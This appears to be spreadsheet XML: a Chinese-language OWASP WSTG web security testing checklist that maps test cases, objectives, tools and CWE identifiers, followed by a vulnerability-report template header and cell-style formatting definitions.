  <si>
    <t>7.16</t>
  </si>
  <si>
    <t>WSTG-INPV-16</t>
  </si>
  <si>
    <t>测试 HTTP 传入请求</t>
  </si>
  <si>
    <t>1.监视对 Web 服务器的所有传入和传出 HTTP 请求，以检查任何可疑请求。
2.监控 HTTP 流量，无需更改最终用户浏览器代理或客户端应用程序。</t>
  </si>
  <si>
    <t>7.17</t>
  </si>
  <si>
    <t>WSTG-INPV-17</t>
  </si>
  <si>
    <t>测试主机头注入</t>
  </si>
  <si>
    <t>1.评估应用程序中是否动态解析主机标头。
2.绕过依赖标头的安全控制。</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
Netcat</t>
  </si>
  <si>
    <t>CWE-74
CWE-116</t>
  </si>
  <si>
    <t>7.18</t>
  </si>
  <si>
    <t>WSTG-INPV-18</t>
  </si>
  <si>
    <t>服务器端模板注入测试</t>
  </si>
  <si>
    <t>1.检测模板注入漏洞点。
2.识别模板引擎。
3.构建漏洞利用程序。</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
Tplmap</t>
  </si>
  <si>
    <t>CWE-1336</t>
  </si>
  <si>
    <t>7.19</t>
  </si>
  <si>
    <t>WSTG-INPV-19</t>
  </si>
  <si>
    <t>服务器端请求伪造测试</t>
  </si>
  <si>
    <t>1.识别SSRF注入点。
2.测试注入点是否可利用。
3.评估漏洞的严重性。</t>
  </si>
  <si>
    <t>A10</t>
  </si>
  <si>
    <t>CWE-918</t>
  </si>
  <si>
    <t>7.20</t>
  </si>
  <si>
    <t>WSTG-INPV-20</t>
  </si>
  <si>
    <t>质量分配测试</t>
  </si>
  <si>
    <t>1.识别修改对象的请求
2.评估是否可以修改从未打算从外部修改的字段</t>
  </si>
  <si>
    <t>CWE-915</t>
  </si>
  <si>
    <t>8. 错误处理</t>
  </si>
  <si>
    <t>8.1</t>
  </si>
  <si>
    <t>WSTG-ERRH-01</t>
  </si>
  <si>
    <t>测试错误处理不当</t>
  </si>
  <si>
    <t>1.识别现有的错误输出（即：随机文件/文件夹 (40x)
2.分析返回的不同输出。</t>
  </si>
  <si>
    <t>CWE-209
CWE-210
CWE-431
CWE-497
CWE-544
CWE-550
CWE-728</t>
  </si>
  <si>
    <t>8.2</t>
  </si>
  <si>
    <t>WSTG-ERRH-02</t>
  </si>
  <si>
    <t>测试堆栈跟踪</t>
  </si>
  <si>
    <t>N/A，此内容已合并到：WSTG-ERRH-01</t>
  </si>
  <si>
    <t>9. 密码学</t>
  </si>
  <si>
    <t>9.1</t>
  </si>
  <si>
    <t>WSTG-CRYP-01</t>
  </si>
  <si>
    <t>测试弱传输层安全性</t>
  </si>
  <si>
    <t>1.验证服务器配置（识别弱密码/协议（即 RC4、BEAST、CRIME、POODLE）。
2.检查数字证书的加密强度和有效性。
3.确保 TLS 安全性不可绕过并且在整个应用程序中正确实施。</t>
  </si>
  <si>
    <t>testssl.sh</t>
  </si>
  <si>
    <t>A2
A7</t>
  </si>
  <si>
    <t>CWE-295
CWE-296
CWE-297
CWE-298
CWE-319
CWE-326
CWE-327
CWE-310
CWE-757</t>
  </si>
  <si>
    <t>9.2</t>
  </si>
  <si>
    <t>WSTG-CRYP-02</t>
  </si>
  <si>
    <t>测试填充预言机（Padding Oracle）</t>
  </si>
  <si>
    <t>1.识别依赖于填充的加密消息。
2.尝试破坏加密消息的填充并分析返回的错误消息以进行进一步分析。</t>
  </si>
  <si>
    <t>PadBuster
POET</t>
  </si>
  <si>
    <t>CWE-326
CWE-649</t>
  </si>
  <si>
    <t>9.3</t>
  </si>
  <si>
    <t>WSTG-CRYP-03</t>
  </si>
  <si>
    <t>测试通过未加密通道发送的敏感信息</t>
  </si>
  <si>
    <t>1.识别通过各种渠道传输的敏感信息。
2.评估所使用渠道的隐私和安全性。
3.在传输过程中检查敏感数据：
• 身份验证中使用的信息（例如凭证、PIN、会话
标识符、令牌、Cookie…）
• 受法律、法规或特定组织保护的信息
政策（例如信用卡、客户数据）</t>
  </si>
  <si>
    <t>CWE-311
CWE-319
CWE-523</t>
  </si>
  <si>
    <t>9.4</t>
  </si>
  <si>
    <t>WSTG-CRYP-04</t>
  </si>
  <si>
    <t>弱加密测试</t>
  </si>
  <si>
    <t>提供识别弱加密或散列使用和实现的指南。</t>
  </si>
  <si>
    <t>Testssl.sh
Nessus</t>
  </si>
  <si>
    <t>CWE-261
CWE-320
CWE-321
CWE-322
CWE-323
CWE-324
CWE-325
CWE-326
CWE-327
CWE-328
CWE-329
CWE-330
CWE-331
CWE-335
CWE-336
CWE-337
CWE-338
CWE-340
CWE-347
CWE-354
CWE-759
CWE-760
CWE-780
CWE-798
CWE-916</t>
  </si>
  <si>
    <t>10.业务逻辑测试</t>
  </si>
  <si>
    <t>10.1</t>
  </si>
  <si>
    <t>WSTG-BUSL-01</t>
  </si>
  <si>
    <t>测试业务逻辑数据验证</t>
  </si>
  <si>
    <t>1.识别数据注入点。
2.验证所有检查都在后端进行且无法绕过。
3.尝试打破预期数据的格式并分析应用程序如何处理它。</t>
  </si>
  <si>
    <t>CWE-840</t>
  </si>
  <si>
    <t>10.2</t>
  </si>
  <si>
    <t>WSTG-BUSL-02</t>
  </si>
  <si>
    <t>测试伪造请求的能力</t>
  </si>
  <si>
    <t>1.查看项目文档，寻找可猜测、可预测或隐藏的字段功能。
2.插入逻辑上有效的数据以绕过正常的业务逻辑工作流程。</t>
  </si>
  <si>
    <t>10.3</t>
  </si>
  <si>
    <t>WSTG-BUSL-03</t>
  </si>
  <si>
    <t>测试完整性检查</t>
  </si>
  <si>
    <t>1.查看移动、存储或处理数据的系统组件的项目文档。
2.确定组件在逻辑上可接受的数据类型以及系统应防范的数据类型。
3.确定谁应该被允许修改或读取每个组件中的数据。
4.尝试插入、更新或删除每个组件使用的数据值，而这在业务逻辑工作流程中是不允许的。</t>
  </si>
  <si>
    <t>Burp Proxy</t>
  </si>
  <si>
    <t>CWE-840
CWE-472</t>
  </si>
  <si>
    <t>10.4</t>
  </si>
  <si>
    <t>WSTG-BUSL-04</t>
  </si>
  <si>
    <t>测试进程时序</t>
  </si>
  <si>
    <t>1.查看项目文档以了解可能受时间影响的系统功能。例如执行时间或操作
帮助用户预测未来的结果或允许用户规避业务逻辑或工作流程的任何部分。例如不
在预期时间内完成交易。
2.开发并执行误用案例，确保攻击者无法根据任何时机（竞争条件）获得优势。</t>
  </si>
  <si>
    <t>CWE-840
CWE-362</t>
  </si>
  <si>
    <t>10.5</t>
  </si>
  <si>
    <t>WSTG-BUSL-05</t>
  </si>
  <si>
    <t>测试函数可以使用的次数限制</t>
  </si>
  <si>
    <t>1.确定必须对其调用次数设置限制的函数。
2.评估功能是否设置了逻辑限制以及是否经过正确验证。
3.对于在业务逻辑工作流程中发现只应执行一次或指定次数的每个功能和特性，开发可能允许用户执行超过允许次数的滥用/误用案例。</t>
  </si>
  <si>
    <t>A4
A7</t>
  </si>
  <si>
    <t>CWE-799</t>
  </si>
  <si>
    <t>10.6</t>
  </si>
  <si>
    <t>WSTG-BUSL-06</t>
  </si>
  <si>
    <t>工作流程规避测试</t>
  </si>
  <si>
    <t>1.查看项目文档，了解以与预期业务逻辑流程不同的顺序跳过或执行应用程序流程中的步骤的方法。
2.制定误用案例并尝试规避已识别的每个逻辑流程。</t>
  </si>
  <si>
    <t>10.7</t>
  </si>
  <si>
    <t>WSTG-BUSL-07</t>
  </si>
  <si>
    <t>测试针对应用程序滥用的防御措施</t>
  </si>
  <si>
    <t>1.从针对系统进行的所有测试中生成注释。
2.根据积极的输入审查哪些测试具有不同的功能。
3.了解现有的防御措施并验证它们是否足以保护系统免受绕过技术的侵害。
4.可能表明应用程序具有内置自卫功能的措施：
• 改变响应
• 阻止请求
• 注销用户或锁定其帐户的操作</t>
  </si>
  <si>
    <t>CWE-693</t>
  </si>
  <si>
    <t>10.8</t>
  </si>
  <si>
    <t>WSTG-BUSL-08</t>
  </si>
  <si>
    <t>测试上传意外的文件类型</t>
  </si>
  <si>
    <t>1.查看项目文档以了解系统拒绝的文件类型。
2.验证不受欢迎的文件类型是否被拒绝并被安全处理。 另外，检查网站是否仅检查"Content-type"或文件扩展名。
3.验证文件批量上传是否安全，并且不允许任何绕过设置的安全措施。</t>
  </si>
  <si>
    <t>CWE-434
CWE-602</t>
  </si>
  <si>
    <t>10.9</t>
  </si>
  <si>
    <t>WSTG-BUSL-09</t>
  </si>
  <si>
    <t>测试上传恶意文件</t>
  </si>
  <si>
    <t>1.识别文件上传功能。
2.查看项目文档，以确定哪些文件类型被视为可接受，以及哪些类型被视为危险或恶意。
3.如果没有可用的文档，则根据应用程序的目的考虑什么是合适的。
4.确定如何处理上传的文件。
5.获取或创建一组恶意文件进行测试。
6.尝试将恶意文件上传到应用程序并确定是否被接受和处理。</t>
  </si>
  <si>
    <t>CWE-434</t>
  </si>
  <si>
    <t>10.10</t>
  </si>
  <si>
    <t>WSTG-BUSL-10</t>
  </si>
  <si>
    <t>测试支付功能</t>
  </si>
  <si>
    <t>1.确定电子商务功能的业务逻辑是否稳健。
2.了解支付功能的工作原理。
3.确定支付功能是否安全。</t>
  </si>
  <si>
    <t>CWE-472
CWE-602
CWE-807</t>
  </si>
  <si>
    <t>11. 客户端测试</t>
  </si>
  <si>
    <t>11.12</t>
  </si>
  <si>
    <t>WSTG-CLNT-12</t>
  </si>
  <si>
    <t>测试浏览器存储</t>
  </si>
  <si>
    <t>1.确定网站是否在客户端存储中存储敏感数据。
2.应检查存储对象的代码处理是否存在注入攻击的可能性，例如利用未经验证的输入或易受攻击的库。</t>
  </si>
  <si>
    <t>CWE-312
CWE-313
CWE-315
CWE-922</t>
  </si>
  <si>
    <t>11.13</t>
  </si>
  <si>
    <t>WSTG-CLNT-13</t>
  </si>
  <si>
    <t>跨站脚本包含测试</t>
  </si>
  <si>
    <t>1.在整个系统中查找敏感数据。
2.通过各种技术评估敏感数据的泄漏。</t>
  </si>
  <si>
    <t>11.14</t>
  </si>
  <si>
    <t>WSTG-CLNT-14</t>
  </si>
  <si>
    <t>反向 Tabnabbing 测试</t>
  </si>
  <si>
    <t>CWE-1022</t>
  </si>
  <si>
    <t>12.API测试</t>
  </si>
  <si>
    <t>12.1</t>
  </si>
  <si>
    <t>WSTG-APIT-01</t>
  </si>
  <si>
    <t>GraphQL测试</t>
  </si>
  <si>
    <t>1.评估是否部署了安全且可用于生产的配置。
2.验证所有输入字段免受一般攻击。
3.确保应用适当的访问控制。</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
GraphSQL Raider</t>
  </si>
  <si>
    <t>CWE-1347</t>
  </si>
  <si>
    <t>Web 应用程序漏洞模板</t>
  </si>
  <si>
    <t>No</t>
  </si>
  <si>
    <t>问题名称</t>
  </si>
  <si>
    <t>危害</t>
  </si>
  <si>
    <t>可能性</t>
  </si>
  <si>
    <t>影响</t>
  </si>
  <si>
    <t>OWASP Top 10 映射</t>
  </si>
  <si>
    <t>观察与启示</t>
  </si>
  <si>
    <t>建议</t>
  </si>
  <si>
    <t>测试证据</t>
  </si>
  <si>
    <t>1</t>
  </si>
  <si>
    <t>WSTG-INFO-001</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>Moderate</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</si>
</sst>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4">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="14"/>
      <color theme="0"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Open Sans"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FFFFFFFF"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FFFFFFFF"/>
      <name val="Calibri"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>
      <color theme="0"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FFFFFFFF"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color theme="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0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
  </fonts>
  <fills count="39">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF002A7F"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF0091DA"/>
        <bgColor rgb="FF0091DA"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFA5A5A5"/>
        <bgColor rgb="FFA5A5A5"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFA5A5A5"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF000000"/>
        <bgColor rgb="FF000000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="7" tint="0.6"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="9" tint="0.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52">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0" fillId="9" borderId="2" applyNumberFormat="0" applyFont="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3" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="0" borderId="3" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="4" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="21" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="10" borderId="5" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="23" fillId="11" borderId="6" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="11" borderId="5" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="5" borderId="7" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="26" fillId="0" borderId="8" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="9" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="12" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="13" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="14" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="15" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="16" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="17" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="18" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="19" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="20" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="21" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="22" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="23" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="24" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="25" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="26" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="27" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="28" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="29" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="30" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="31" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="32" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="33" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="35" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="36" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="37" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="38" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0"/>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0"/>
  </cellStyleXfs>
  <cellXfs count="52">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="49" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="49" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="49" applyFont="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="49" applyFont="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="49" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="4" borderId="1" xfId="51" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="51" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="51" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="51" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="49" applyFont="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="5" borderId="1" xfId="49" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="4" borderId="1" xfId="50" applyFont="1" applyFill="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left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="8" fillId="0" borderId="0" xfId="49" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="0" xfId="50" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="11" fillId="6" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="7" borderId="1" xfId="49" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="8" borderId="1" xfId="49" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="1" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="10" fillId="0" borderId="1" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>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9" fillId="0" borderId="0" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="0" borderId="0" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="0" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="4" fillId="4" borderId="1" xfId="50" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="49" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1" quotePrefix="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
